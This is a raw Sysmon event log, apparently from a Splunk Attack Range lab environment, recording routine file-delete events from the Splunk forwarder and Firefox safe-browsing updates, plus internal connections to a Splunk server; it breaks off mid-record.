23542300x80000000000000001045531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BD9A643BE4EFA8342C81F63B9616F4F,SHA256=2B099FA0EB2DC2319777163EA602FA8A0D553A316321F7E013F77AFB18641052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:42.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6386750B26D98AD27300C426193038,SHA256=3C67A9B0AE2DB2AC6B4AB735FF2A379596A8C982B2E46C055F36607F117404FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:42.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9AB778CAD6D3E1B8C45E175E36F3BA,SHA256=8895746A75B9DF48233149EBB4F76D4A2D280DE85100A9B5AC7F177521A614FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:33.683{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50881-false10.0.1.12-8000- 23542300x8000000000000000805833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:43.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A927449DCA41E92D42364980116CC0,SHA256=A0488E43655A3BD4F78B46373A0A3D5B43145E9B83FE42F88C2688595A33583F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:43.737{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD980509A1B674865E43150F2CBCA7CB,SHA256=B1676F348FDD8FF03490085DD5D3C74B4652F650C3C58C87DBDD0AC0B8D5D72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:44.939{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7A3BA4E45416FF5C64FAC0642BA958,SHA256=1C95EB5BB1C2A5E8A501292AD1F3D22650D94D29EAA4D09E4E21EA60F14940B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:44.752{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83F4FA09E7A5CA7B5CF9E142308132B5,SHA256=B87665074FA00B61E6C1733A93C8E517BDDDC5ACD99B19D2EEAB3CFB9AB707A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:45.954{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9E4FD47027A975781D4F18F23EB9EC,SHA256=20257230C6A42846DEF39449425536EE60784B90516357167B67E9AE89BBBE48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:45.783{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17E6F06343C33C9D6ABBE4E754656F50,SHA256=84787243B38FD7482E828453F1A10036A1D01D84E36CD08918200894450B4E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:46.800{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F158474B8AD3BA3F58A84C26F7F04AB0,SHA256=DB23B731FDF952502830B1D73C1C012EAF09891E6498F6A2F84C440F212DF1C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:44.337{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57136-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:47.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=254C77D06EDCCB468435E3D330F66608,SHA256=A1B62A57C9CFFC77A5DE045735C5CC7A209976A466DE805621FD32321EF0DEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:47.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B115BEE86B4C7956C1B39950606AB5,SHA256=48DA28841ABAF52537C04CF93986CC44F53E46AF246756638187C2D09984F198,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:39.640{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50882-false10.0.1.12-8000- 23542300x80000000000000001045583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=0E6406BCED06B69AEB6C8CA463C0EBAB,SHA256=884CCC1F3FAAB666B5DAE09256AD409EE961AC8E8EB0DF4B9144DF09CFDD0035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=5AD4772D4BE6E9CC7CFA00B64B6CE71A,SHA256=C324FCF91D4B541EB93422BDD5FA434E39A752B6D7A93D78E70472F6D9B1EF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=23F92D6A4085DA3A049409C9EF6E6F24,SHA256=9F6D9C12BB68A8D0EE3F884519916D7F3D174C4F85BFE2BD208CE27A4D1E1D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8DC78A562E1B268958A981D0AD7EAD74,SHA256=2A960282D759EAE224A8A47ABAD7A54DF042460DF0E5AC83A793FA822615FB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=3B53A80D80584F5F16860FB04FBBB50C,SHA256=578B167D678436BE970332CB1F2B38D237BBFD6DAF46C2D565F0A457F7C00D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.938{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=630E6BAA0AB0AD54050AFA8D0A5A478C,SHA256=7E1952C7293F78C27C13E8FB5DCAFA94E9439A6A4B342BCEC4DBEF4B8B99E977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.907{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.891{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=630E6BAA0AB0AD54050AFA8D0A5A478C,SHA256=7E1952C7293F78C27C13E8FB5DCAFA94E9439A6A4B342BCEC4DBEF4B8B99E977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.870{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.838{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE8B9F834041C9187460E4FAC04CD81B,SHA256=45DCEDF8646C0885AFD9F438993F8E3526A276EA9B7BDD442FE5309CACFD5A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:48.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E04BCC7C2AF8B0E35C2F3C2AD6389D7,SHA256=F02827AA2E31C437E7CBA0E592CDE86CE37BBE3FDD6A052664EC1926E45D0BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C0651B0CB496569EC5EA27EA4A2E579C,SHA256=8280063A02D54619C51F0B1EA4B4FF356E88D6AD8BD2C6A9DBD4705A0CD1025F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.823{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 